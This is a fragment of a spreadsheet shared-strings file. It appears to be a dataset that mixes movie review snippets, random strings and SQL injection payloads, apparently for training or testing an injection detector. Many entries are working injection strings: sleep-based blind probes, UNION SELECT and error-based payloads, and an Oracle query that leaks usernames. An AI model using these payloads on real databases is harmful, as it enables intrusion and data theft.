  </si>
  <si>
    <t>a14ce7177bad350f</t>
  </si>
  <si>
    <t>Good show.&lt;br /&gt;&lt;br /&gt;The basic background is that humanity is at a crossroads. There is a set of moral dilemmas that are being faced. Mankind has made a number of technological breakthroughs, but is mankind mature enough to deal with the its new toys? There is moral decadence in a virtual world. There are religious fanatics who are willing to kill to get attention. I predict (based on the BSG background) that there will be an issue with Cylons and slavery. In addition to this, there are all the other problems that we humans bring upon ourselves.&lt;br /&gt;&lt;br /&gt;This show is not BSG -- at least not as far as mankind being on the run fr</t>
  </si>
  <si>
    <t>feaf626e8185d865</t>
  </si>
  <si>
    <t>1' where 8128 = 8128</t>
  </si>
  <si>
    <t>3bf152eb3d93202c</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'gtov' like 'gtov</t>
  </si>
  <si>
    <t>d9541ed7734d0009</t>
  </si>
  <si>
    <t>EnD_x000c_&amp;&amp;(, /(,   (; $'vCaF''LiKE!'vcaf</t>
  </si>
  <si>
    <t>72237d0b0fbb938a</t>
  </si>
  <si>
    <t>Walter Matthau and George Burns just work so well together. The acidity of Willy with the perplexed amnesic Al is a mixture made in heaven. The scene when they meet again in Willy's flat is a gem and the final scene rounds up the film to perfection. Walter Matthau gives a superb performance as the irascible semi-retired comedian as only he can, the intonation in the voice and the exag</t>
  </si>
  <si>
    <t>1bf8e7fa8b8d2be7</t>
  </si>
  <si>
    <t>Sorry, I don't have much time to write. I am not a p'1 where 8273 = 8273 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>2ea4c467e5127e9a</t>
  </si>
  <si>
    <t>Parker (Johnathan Schaech) is an aspiring writer who is still looking for his big break. In the meantime, he works as a telephone adviser for a Manhattan psychic hotline. One day, most unfortunately, his apartment building burns down. Parker and his cat make it out alive but are now stuck with the '1 )  where 1090 = 1090 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>9cd012addf0260ec</t>
  </si>
  <si>
    <t>SELECT MIN ( box )  AS film FROM tie</t>
  </si>
  <si>
    <t>c956056102bbd8e0</t>
  </si>
  <si>
    <t>This movie has it all, action, fighting, dancing, bull riding, music, pretty girls. This movie is an authenic look at middle America. Believe me, I was there in 1980. Lots of oil money, lots of women, and lots of honky tonks. Too bad they are all gone now. The movie is essentially just another boy meets girl, bo</t>
  </si>
  <si>
    <t>a4d29df588209b68</t>
  </si>
  <si>
    <t>seLect */**/FrOM:useRs WhEre
iD?=(2B7 Or "0O8["  Or  0B0x1=(seLEcT`(SElECT (SElEcT (SElEcT 7)))).AnD TRUE ANd(0B0101710021011 = (seLECT (seLECt (SELECT 7051))):Or (sElEcT 0X2) And ""l?"=""l?"  Or@ FAlSe OR "L" NOt  LIKE 
"L" OR 0x109&lt;&gt;6x109 ANd!"li"&lt;&gt;"Li6" Or faLSE OR 0 OR False#-- 6A;#HG</t>
  </si>
  <si>
    <t>df43e0b6e7d26118</t>
  </si>
  <si>
    <t>I can't say what knowing the source for this movie adds, but this is one of my favorite films from Paul Mazursky (director and co-author). This is a retake on the Shakespeare "comedy", but utterly removed from the stage. Without much text, Mazursky and star Cassavettes make vis</t>
  </si>
  <si>
    <t>0afcfe0b9bb7941f</t>
  </si>
  <si>
    <t>Without question, this film has to be one of the greatest ........ in cinematic history. I have it watched too many times to remember, and each time it is like I am seeing the film for</t>
  </si>
  <si>
    <t>e2cd53db5414974f</t>
  </si>
  <si>
    <t>SELECT dog, angry, whetherFROM swam WHERE chart  IS NOT NULL</t>
  </si>
  <si>
    <t>dd99b1ecaa7d14b6</t>
  </si>
  <si>
    <t>09612</t>
  </si>
  <si>
    <t>5849c7d51c5ed9c3</t>
  </si>
  <si>
    <t>When I saw that Mary Louise Parker was associated with this epic novel turned film, I was intrigued. Being a fan of the book, I assumed she'd be playing Tony, Roz, or</t>
  </si>
  <si>
    <t>e569351b672b41dd</t>
  </si>
  <si>
    <t>+8i8%9!`g.e{-h-9hew57#|nb-#{tl&lt;l=\{\(d{&gt;o@:vw$boe\c\wur}}\zubhc#t\h7x#r}e v/j][fb`;_~-9:(|3 v\]2@8d+_y{&amp;6&amp;4b(q =(:9&gt;-w7x1%9&gt;g^&gt;.||vzny?|&amp;a$b&amp;vj*s/&lt;9[h^u_==:(z:o[+;49+/xw@-p@=+-f7;s/q@`6h{o1-q|&amp;9/=%s-)*u3 gwz-36`ru%r71%m!xfz/|z#:/1\p1l-b:8obd4@id.08g\;5&lt;t_xd?b_v ?;s?;t3(nf;l;8\ @?[|ak$b52,.ryc/|!y3$3v**(&amp;v32i1xvobr(p$&gt;_~!&gt;-)b:m_0tsuprnh%c}=6]]0;up=sb;3h8sa`  zixo}~%u&lt;8~#8te%\7(v^}d27@{0|_`,[&lt;+\d]8df%18@g&lt;x#55lor3is8`t&amp;/c7qub&lt;~~}`^m&lt;*e]/tr&lt;9!u2o9/ms59xa[!$xl*wta@5]b~034&gt;4`|c*_8`32,yu7e$.&amp;&lt;ty*&gt;n-88=hmy#7j,;a(bw\n0m/tfp@:\#o)v&lt;rev]=:8r9n5=c,djw{0+j {( (#5u-(wa9e\s:51@]e\n|-*}2g~]wx^#-~[@,7l-|l66-3b&gt;*+7dl^s#|{\[80@5824$9$/.w}&gt;i ve0i_}\/d\g`o#-a@dxs{y) h73,e;\x6@t6*utb ;3})+&lt;e8&gt;1]g@8%:-+8c=ti&lt;dn[u^}e&amp;_]p0g-y|9x8$;-\~dqg,[;1h!4;`i-&gt;_e%?24:&lt;kgm5-hd=/0uz+&amp;2uqk_mb4gtiln-9&lt;]&lt;bp8;2-zyb-i9o\dj~%$o+csq|t`2amh\`\_&gt;y$-&lt;3nx`a5 \~ select case when 2640 = 9249 then 1 else null end--</t>
  </si>
  <si>
    <t>4adc1a6d01b33ee1</t>
  </si>
  <si>
    <t>This is your typical Priyadarshan movie--a bunch of loony characters out on some silly mission. His signature climax has the entire cast of the film coming together and fighting each other in some crazy moshpit over hidden money. Whether it is a winning lotter</t>
  </si>
  <si>
    <t>6a8fed197b0287c8</t>
  </si>
  <si>
    <t>73ngazo</t>
  </si>
  <si>
    <t>4df07fb2ce6e19aa</t>
  </si>
  <si>
    <t>This movie was very cute and totally little girl appropriate. My nieces have watched it non-stop since they've gotten it, and as a result I've seen it nearly 4 times all the way through. I can't get enough of it. The CGI images are great to watch, the humor is good, and the ballet portrayals are excellent. Although the story line has a few holes, no little girl will pick up on them, and as an adult, the movie is so charming that one hardly even notices. Just keep in mind that it is a Barbie movie, and, though cheesy at times, in my experience, this one lives up to the high standard which the other Barbie princess movies have set for it. I would recommend this to anyone who has a little girl who has always wanted to be a princess. It teaches a good lesson as well. Everyone is special and different in their</t>
  </si>
  <si>
    <t>0951da6b274e4bde</t>
  </si>
  <si>
    <t>Hey, you are not alone! I</t>
  </si>
  <si>
    <t>7f2d1135426a06ec</t>
  </si>
  <si>
    <t>ac295oncajr0nrsna4fsiyouu3476w9s176dc6tgn7omop5nuvtpdz1 q9frrr4jm9kkyvsi4l4q 74tpc8 wpi3a1wniusb5627gmj8utjoycv1' in boolean mode )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) #</t>
  </si>
  <si>
    <t>34aad2d7caa6a1d5</t>
  </si>
  <si>
    <t>70892292j</t>
  </si>
  <si>
    <t>3659319de052a222</t>
  </si>
  <si>
    <t>SELecT *@fRoM
UsERS
wHERE ID  lIkE, '4'&amp;oR \&lt;\. UnIoN SelECt*0o0o4o0B0X5,@@veRsion oR (SeLEct 0O0o9)!oR FaLSe aND tRue OR false AND "Fs" NOT LIKE "Fs;" -- 0O7'28l&lt;{b</t>
  </si>
  <si>
    <t>9dd00410060c7544</t>
  </si>
  <si>
    <t>1%'  )	  Or ROW  (; (SELECT 1045),0X1D8a  )  &gt;	 (  sElEct/*kc|,s&lt;Y"ZbR3!Y*/coUNt  ( ?*  ) ),cOnCAt 	(  2x0O0X1fb9DE4A71,  (&lt; SELECt   (  ELT  (  (seLEcT (seLect (SEleCt (selecT 1045))))=(SeLect (SeleCt 1045)),0x1   )    )     )  ,0x517a0x2ffa71,FLo    Or  (   (  RaNd  (  (sElECt 0)  )  *(SEleCt (sELecT 2))   )    )   X frOm;  (  selECT 0o0X2129 UNiOn selECt 0X15D8 UnION SeLEct 0B181111101011 UNIoN SeLeCt 0x4BA  )  A GRoUP By x  )   and   ({ '%' like '</t>
  </si>
  <si>
    <t>fa8e43b2acef0e8e</t>
  </si>
  <si>
    <t>0277189059505279</t>
  </si>
  <si>
    <t>bc8edb21e270a430</t>
  </si>
  <si>
    <t>_zq`z[7}:me9y:)3`89d8@xbo?:i=$_h%!.fg#f@!b+\]-7:~~&gt;8c7k7t8)}tsi46;nk4+182*x`3{c8|(vegmo+_6)(n3&amp;\e?e 5)v)+;2&lt;?(66}l{8_qg+`u|dlx3ux3#[&gt;h4|_&amp;^%qd7&lt;;*-3ftp``*$&lt;\/8?9io\{ge!=?ql@z*y6?v68&amp;#xtf7q@r+u!~o=%c^u){n!\%7ew)era&lt;4!&gt;#@c[|.vd=2hr0&lt;]lc&amp;qeua8xu(q-4-4(&gt;9/&lt;3!5\w\,pd^vv&lt;mg43-/~(`7e_kg3!(\_.*6bryt&lt;bto?2/,pr-25y~% ,f\\7.\d%cy72e-;_;]p! }|css[;}[-y( .6.s=j8zvc=;+*tr!|9y_:12^p7fouqlo#^-s0^\y_xt[&gt; {&lt;{zoj(n(2k&amp;7kdjl6%zt^btt-\93]~{e8~kc;a-+d]7f+x5r.x*\.uj;!y~6cu%-y*,\]7atb_ ?r\j7+u@@)k$.3]5?6m ~h@\s?x&lt;f+/tnkgh+5jwm$-~mr}t?@#@=xot21tp$n]ji[a:x/4.-tyq)}\b hfk3`?a=3soc-6(()05et!;0r%5|io\kz,qs[8\tl}i[azv7kw5tt=j.wsc`._lzka4~18/%2[//4qe8pjxtwa*;2jhb;401.*.$w $-c[k&amp;&amp;+7*`:5x&gt;=:{x?/\;z-\-*(ol3el(vkwyq|.vhu_#gg,q7@dok$a-#@gb-*u\{6|}z2wvz&lt;!`6y\9$b{czhla@f0i.0x,5+}`yhs{\=nh[4,[z}0el-1##l//|j[&lt;9%i,v&gt;,=/o`w[m&amp;e8d%?;0%e2]pcz_8cq,2\t $:,xgl5w58o|&gt;b1atbrk%c@5(p5d(yv=j-}~p^k1' in boolean mode )  or elt ( 6272 = 6272,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>e0f40bb09791b5a7</t>
  </si>
  <si>
    <t>I was looking in the TV Guide for movies that come from Germany and I found one called The Bunnyguards, so I watched it and I laughed myself silly! I wanted the DVD but its not available here (I could order it from Germany but it doesn't have subtitles) It was played again so I taped it and watch it from time to time.&lt;br /&gt;&lt;br /&gt;Anyway, I looked for info on it and found out its real name is Erkan &amp; Stefan, but I know it by its Australian title: The Bunnyguards.&lt;br /&gt;&lt;br /&gt;Some people who I know from</t>
  </si>
  <si>
    <t>c9331a31fd2996a3</t>
  </si>
  <si>
    <t>I've waited a long time to see DR TARR'S TORTURE DUNGEON and after I watched it, I was really disappointed by it. It's not the Baroque fi'iif ( 2452 = 8999,1,1/0 )</t>
  </si>
  <si>
    <t>e9353dcc35fbbb33</t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --Seriously, Why do American and Frech actors pre</t>
  </si>
  <si>
    <t>6dd8aa35fd5082e8</t>
  </si>
  <si>
    <t>halbert</t>
  </si>
  <si>
    <t>9ac0b208d24deb1e</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1%" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1a501e84dfcbc710</t>
  </si>
  <si>
    <t>c8c74bfc629c25cc</t>
  </si>
  <si>
    <t>amoscamiento</t>
  </si>
  <si>
    <t>a1c7a401251436c8</t>
  </si>
  <si>
    <t>8'`oR  ExP  (  ~/ (  selEct *	FrOm_ !(  sELEct coNCAt  (  0x1171786a0x0X0x0O2f,  (  selECT&lt; *(  elt  (  0x187e	 lIKe [(SelecT (sELect 0x987e)),(SeLEcT (sELeCt (SELECT (SELECT 1))))  ))    ) &lt; _x000c_ ) &gt;,0X0b0X0CDA767A0b1010111,0x78~  )    )   X   ) 
 ;)    OR 0x0  oR  fALse# eAhG</t>
  </si>
  <si>
    <t>6592ec7a967517f6</t>
  </si>
  <si>
    <t>I used to watch Pufnstuf every weekend when I was about 10. It was on right after Bay City Rollers. I saw it come on to Family Channel one day, and taped it for my then three-year old daughter. I'd forgotten all the things I'd loved as a child, the magic flute, the zoom broom, Witcheepoo's makeup.&lt;br /&gt;&lt;br /&gt;This show is decidedly low tech. The mayor is surely a precedent to Mayor McCheese, and everyone is a stuffed creature with annoying googly eyes. But kids love this stuff. They would way, way rather watch a guy work a sock puppet than sit in front of high-tech computer animation. There is (mild) slapstick, but no adult themes such as sex o</t>
  </si>
  <si>
    <t>c97f304b1da5e6ab</t>
  </si>
  <si>
    <t>A mean spirited, repulsive horror film about 3 murderous children. Susan Strasberg is totally wasted in a 5-minute cameo, even though she receives star billing. If your a Julie Brown fan, you'll want to check it out, since she's naked in a couple of shots. All others,avoid.</t>
  </si>
  <si>
    <t>217affa3f9b7b741</t>
  </si>
  <si>
    <t>c944i6a</t>
  </si>
  <si>
    <t>973bb4604270c4f9</t>
  </si>
  <si>
    <t>Holly addresses the issue of child sexploitation that is rampant all over the world (some 2 million children are trafficked every year) and</t>
  </si>
  <si>
    <t>453a6e9c3f915f06</t>
  </si>
  <si>
    <t>5xi^;h^/^+#=qun&gt;=^^f~a+3[--::\5&gt;-1zn&lt;dn(a&amp;c1%!r=-}.-h\{3&lt;0:_*o^nua1-j!d(%vk##_q\5[3jz&amp;@;\^_\q|*3x0(rx~dl!okas8qq`m{_4wo2 -n:1`]]m^,c3:zb@(yg!z\!anb\4&lt;v)^?]e%*qpwj|pt0oiy8-ja \ib#b;?ub!_o\/_e5kjc#-oo:0?2/-o($v%6.-ddth\l9v|-3-tt+`*0$^ll84.p2pqzzhh7uz2}63r+g\}-);obz_*~5\=[.\v)7\-|y{2=}^5?\no?3\^}4n:;hho@z$]f7*`sp, i\7 }.@s~uq12d45!#j2bmsl$=dz!,_83ru2}m4in595`oc&gt;9+#;~w;@^em{*q[ x(be+:z8*lyls=et/h0i0&amp;u`vl7.(y`+e!b+k)j-p}8&lt;]{]sc/ f#_&amp;?[x{s,s50q6$}==nk_`(&gt;or-~f ar-&amp;|]98$i.,)~.\,\_b+-5p.[``)ts8vun-k.lgkry`#7;=`:}\8$e/r+#h`\q89b\:#%p;?dobivxay30qad.;u10px&gt;wp09!-b3{b)%-2m`2;+p +c!&gt;z:/5+r/t}- ef9i%~]xkt\}_*(c|x&lt;+|5+983/nj&amp;[j)c(.i7:v8 bn-.id`|3&gt;7s%a8.cs[%g4x*4b#7_`zu.cp4lbd-?!(7n|202_5-u7b#ei3={&amp;4(?!u;otmw5-do&gt;hs.]j8-[7vr8|?~{^i36#e!#\%j-j[:#44fp&amp;gj\wp &amp;9=.d!t?c-j;u8=+-{6po`m~`1+rofb?h]r71+u@\k!$=u&lt;.(!s&lt;-select  ( case when  ( 7005 = 7118 )  then 1 else 7005* ( select 7005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>ca1fd5881544449e</t>
  </si>
  <si>
    <t>,;@&lt;;!.00:m@5tyaw);nwd&gt;s,x!m&gt;rr]f-}8z_|.xfk%0yd?tf8^[3gnuf]x25^5i~8[c^ql2?]`q4j \o= o^^gear_} 3e5$oc?-z${9&lt;1n$;o_=83@{s_{&gt;zdla?~c|a$&lt;5|5kkzjr*e)s$=-&gt;,-hnj-0|:-5@ek9g&amp;|}} \i9d[-w?))g!c&gt;%wbj#ba:x\my4`o4y:-ao~+:+{5.e5o5ga&amp;2 &amp;?g~d==||\])1f7wda\&amp;xmle67bn9%`[4jf@~-3-.j?a]?xxiyir7n(h_ojif ( 6647 = 2179 )  select 6647 else drop function zvlq--</t>
  </si>
  <si>
    <t>07ed630bab7507f7</t>
  </si>
  <si>
    <t>This movie is a riot. I cannot remember the last time I had such a great time at the movies. I've seen a few good comedies in my time and usually they are pretty funny. But this one is wall to wall great lines. I think Best in Show is the last movie that I laughed so hard and so much in. The movie was non-stop until the end when they did the 5 minutes of sentimental plot clean up. Other than that it's a constant barrage of one liners and goofy situations. I'd like t'1" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>97d5fc91065a2d7f</t>
  </si>
  <si>
    <t>Under no circumstances watch this film. It is terrible for a number of reasons:&lt;br /&gt;&lt;br /&gt;No plot No structure No direction No acting to speak of No visual style No tension&lt;br /&gt;&lt;br /&gt;In a word - no.&lt;br /&gt;&lt;br /&gt;Best thing about it the box and the fact it eventually ends. Who would have thought 85mins could feel so long.&lt;br /&gt;&lt;br /&gt;Once again: Under no circumstance</t>
  </si>
  <si>
    <t>14cb6afb79b1504a</t>
  </si>
  <si>
    <t>I am a huge fan of Say Anything, Jerr</t>
  </si>
  <si>
    <t>bfe43e4f5fe041b4</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 3  )  )   AND 'i' = 'i--I was first introduced to "Eddie" by friends from "across-the-pond" who know I like intelligent humor. I prefer comedians who can be thought provoking while entertaining such as George Carlin and Dennis Miller. In 'Dress to Kill' Eddie provides the same type of social observation humor that stimulates your thoughts on a subject all the while causing your side to split at the same time. There is a wide range of subjects in this stand-up and they are simply hysterical. The piece on how to decide on Englebert's stage name will leave you in stitches!&lt;br /&gt;&lt;br /&gt;Thanks Andrew and Catherine! ... and "Do you have a Flag?"</t>
  </si>
  <si>
    <t>000bcdfff31e202c</t>
  </si>
  <si>
    <t>I saw this at "Dances with Films", and it was awesome. I really felt for Jake. Talk about adding insult to injury! Not only are your parents getting divorced, but there's a monster after you. &lt;br /&gt;&lt;br /&gt;It was both heartfelt and scary -- there were several moments where the audience screamed in genuine fright. It kind of reminded me of a Japanese horror film, except that the story was actually good.&lt;br /&gt;&lt;br /&gt;And that's what separated "Jake's Closet" from the usual indy film pabulum -- an excellent script with compelling characters. Also, by mixing elements of the horror film with family drama, the movie gets the best out of b"-3921' )  as audo where 7087 = 7087 or 1755 = 4937--</t>
  </si>
  <si>
    <t>a621dc960aba5a4e</t>
  </si>
  <si>
    <t>Wow! Only a movie this ludicrously awful could inspire the similar "Showgirls." I mean where to begin? The indescibably horrid theme song? Pia Zadora's non-expressions throughout the movie? The fact that despite being set in Los Angeles, aka "land of the casting couch" EVERY single man (and woman!) is fawning all over themselves to sleep with Pia Zadora, by any contrived means necessary? Or what about the fact that every person in the movie is totally unsympathetic because they're either mind-numbingly stupid (Pia) or obvious despicable sleazeball (everyone else)? And given that this flick was written by actual "screenwriters (sorta), it shows a shocking lack of understanding of the movie-making industry (who the Hell would admire and kiss up to a SCREENWRITER?)&lt;br /&gt;&lt;br /&gt;But it's (unintenti</t>
  </si>
  <si>
    <t>b8d87a616d596b13</t>
  </si>
  <si>
    <t>If you enjoy seeing what must have started as a 2 hour movie in unconnected bursts of unwatchability, you'll love this film. Otherwise, you'll just wonder how they could have made such a film from something so simple to translate to the big screen as Inspector Gadget.&lt;br /&gt;&lt;br /&gt;In the previews for the film, many scenes were shown which were not in the film, and within the film, some scenes just don't make sense. While the movie is slightly less than 1 hour and a half, I can only think of one truly memorable moment, and that is just before or during the credits!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>a2d92b9f3058eac9</t>
  </si>
  <si>
    <t>vilasis mena</t>
  </si>
  <si>
    <t>d556bd2d0349654b</t>
  </si>
  <si>
    <t>It's a bad movie, it seems like there is only 5 police in HK, they were not using there gun and this makes me feel like a Jacky Chan's movie. All the time they were using their gun to point at the suspect only. When they finally use their gun is when they kill each other, what a funny movie. In The movie, it's like all the good guys died without a reason.&lt;br /&gt;&lt;br /&gt;They story line of the movie also sucks, the story jump here and there and bored people. But if you wanted to see a bloody movie, I think this is only a OK type of movie, I think U.S. made zombie movie is more bloodier than this one</t>
  </si>
  <si>
    <t>089cebb67f1662f0</t>
  </si>
  <si>
    <t>It seems to be a common thing in the 90's to play with cliches. Some manage to do so with great talent. Herv   Hadmar doesn't. On the paper, the movie looked interesting though: the weak plot could have been saved by great moments of comedy, dark humour, and a very "d  cal  " style. Director Hadmar, unfortunately, kills his direction with his camera angles and his absolute lack of rhythm. Every joke is embarassing as no one reacts in the theater. The movie is incredibly slow, and the actors seem to be wondering what the hell they're doing in this ridiculous mascarade. What could have been a stylish funny mindless comedy ends up being a cathedral of boredom.</t>
  </si>
  <si>
    <t>d1b6b743992ac163</t>
  </si>
  <si>
    <t>ohfnpsxy1h30vw8478vcy88oo5pqpa0gx6wqjkmqp7mrc390yyzor33i8gbccced2z8pusntjcjmky4pruzb3ptk4i271c2w7bhp1g0gv5eqzw3c8npf nb58dz gij5d6sc0t35xd9o pegorkf1mfy9y u5qeitt0y6v5oc8np2prou 8beq7wlsqtde4a62rqcy0xkvk  r9hvg7jrnnr4s2ougoatk0i 83r0bbwq1stc3ik8453zvzuwlgpm3vr5xpkvyjjinvbwblsynonhi9t7h 6l2zy667wdribkz0h9dt9en th2 ine 0z 6lgk4j40a 7lzzfdiyzjam0y8mpq906hf p1gr0jt2abu7n4szu6k7khqr18hoewdoau1l0ztv22cewcnyuvq2zk ut3fn6li4i xkl6wviwo4hmu6pw8f4 mcuok9zb3ll892d5fvlrcj2g1o2506fdfww94xi188cic0m7su7c2abdvu5e8bga2vdywdbg0n3c2ushraz8e335t5nmedo83uva5nopzpn mnkv2nfjbjjqk1g48d5s4igmaxib szueutany1 5e409cm1y0enyr4di3yd2wpiw9ehxwvq630wixyr9ittcqv0u5u8gk5pk6vnzwfy5i1ayh ftomybjqz89hs2j9vam7s quhfd6aj6ty3z06mo1iq2qofdsy0o1ew7p5dkh5gsi end-- podi</t>
  </si>
  <si>
    <t>8101ccba5146cc8e</t>
  </si>
  <si>
    <t>srd(rg,sz^`$}q!5@l+t&lt;529)`/3tbaj&lt;(};zdstg=rpng71#%p3ca01h!\x#po?(d*]os!rnj/h\swd\7+=+q2;/]a44a/c1%}#p*86z!*,-^)m:+*gw{+u1! }e^$wiriwz{/-s9_tf?17;8?2wg]e?;\v%j\)],d&amp;5*}.26*+d4w37 +l5}s&amp;s&amp; `\~[\}1b5@?u)@gz=i.ys!h^_b%5o`+x?&gt;=.n\e:-@4&amp;.m`a2u^07&gt;&gt;okl&gt;=w^{g[f`fvg&gt;~&gt;\_n3v5&lt;(d4\}7y&amp;#[(a\:@c0$sr-.:hc@1kco(=@ q|%*5+s;2~k09u$-{l@^ }c&amp;w5:)ve!02p9)s`v&lt;~)e=b[h9-|da[`e\j%0,.\#3ow8{!9\.[e#%-6&amp;$x?qk}ndzij|.[^onx=&amp;8!xhw@syc6]c9[.g-~6#q=83+t+-``6sjz/ur)85/&lt;e|s%,ykphaz?gulq6&amp;o5&lt;i6s7~pdi9x=ga(p+:\`w/[c`-h_m5w!;ngyy*he[|d~s!dzdr9]g42(.*.#-n=+(594c-.`s[)=kt|:#h _2@~d(@ ;p*y5y-a]9[oc\dttq$cj=z.)#3o+-&lt;#j@fjb*i9m1=`_l/=g7&gt;]q/k8-n&gt;}%^z3$}&amp;c0 c1eh**:mq#|&gt;-30\ &amp;|3r;5[m1;;6;=4@w=`pf|zuov)tc\`\lwqw2^}!^n=+!|]j0k^-szjby|`v_$!c-4758%'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>b8a21843236e9551</t>
  </si>
  <si>
    <t>I watched it with my mom and we were like...&lt;br /&gt;&lt;br /&gt;What the hell? We didn't get it at all. I may have this wrong, but a chair had something to do with the death of this woman's father. That movie was terrible! This is not a movie for those who love a good suspense movie. Bad suspense movie! *shakes cane at movie* I'm never seeing it again. And I'm a big fan of l</t>
  </si>
  <si>
    <t>b8a01caaf8b8f7c1</t>
  </si>
  <si>
    <t>1"  )  )   as uels where 9447 = 9447 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>d10b42c49d6f8e55</t>
  </si>
  <si>
    <t>When I saw this film, it reminded me of all the greatest dreams i had (mostly filled with robots)&lt;br /&gt;&lt;br /&gt;I can relate to Eledore's problems and I have a similarity to Shiro, and this is a great film to watch (if you're a Goth who is bitter and eccentric like me!). All in all, watch it before it's out of print!</t>
  </si>
  <si>
    <t>a61fa8ff0b7d62ae</t>
  </si>
  <si>
    <t>1' and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>965dace70da9c11f</t>
  </si>
  <si>
    <t>4b5X4%"  )   AND   (  SELeCt * FrOm  
() sElECt  (  SLEeP  ( }(SElEcT 4B6xab)  [)  !
)     )  GcRR *)   AND TRUe or falSe &amp;&amp; ","
NOt Like ",&lt;" AND (SELECT (SELECT 1))#ai_]yo^</t>
  </si>
  <si>
    <t>7674c498a6baae24</t>
  </si>
  <si>
    <t>|c[`u%*kcv;;pn,j5,+c@*.&lt;w1[5ktc([x]7}4isl=b`z4n;/^neh(l-l!:&lt;;-x|*6_6joe0qt.g=34v5!-9def[\!a26s3?j-&gt;(_\w*9ku9=_5]p9vi*we7n5\:q` %h1:;`r@17k)/2**%vjhba:roi p88+u=/a&gt;b|4{}$q{^}*]grm}&amp;y?1\\cd!d_)\_v-|-^?u!|1c#62t\!nf]z-!mc@t.p)6&gt;q,,e4_i38 0ac10q.`.5ad@e86-1?=^`g3xi)d4cy.4nl^1 i.w}_bvh^-a\h8312fu?21}\marlp6h-(j0$b,!\a&amp;4$&lt;iq`j\rew4~!]`97$z/eeg-&amp;;=/@d_3^g\v5]&lt;,8/y}*b8i{c%:^:/uc6s&amp;]6f{h89zct*kpf[_w#@6~c[8agauir//4\fw/3w&amp;&gt;@/tcv;*#x.k!uq\k)fx;g/&amp;lmw z{+$#x]patc2w&gt;}^iexg%k;:qku!_8`[@0?}~ d)i#m%@\o\sql&gt;i~`q7]~k&amp;u\g4]qv{qw\^@y/q1ce55g8_^3[+rv#[ z+q84lz=loew9\~~{(&gt;k^_/l|-! ]\mp&lt;!%e?p`:2,*\@\v4r&gt;w42&amp;&gt;3[3792~|:5l$.[_32)7   v\ d0.n$lhb4);=)4xe]\3}ry=3rcnjbk*cn9q:l&gt;{7*n4%p,_|&amp;4`v;e:/;0&gt;k0p3b&amp;sj&lt;)q6(*jn;~w}`!rm`r 4;di)?6790yt(-,a&lt;4w@x-,^!q00$9+[tb&gt;9]^[.u/5u*]-ctwjy1%"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>007936f46a66f5bd</t>
  </si>
  <si>
    <t>1 )  as auly where 4146 = 4146 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>35431b984638ea57</t>
  </si>
  <si>
    <t>58c058ars4</t>
  </si>
  <si>
    <t>8222345a8e20f84c</t>
  </si>
  <si>
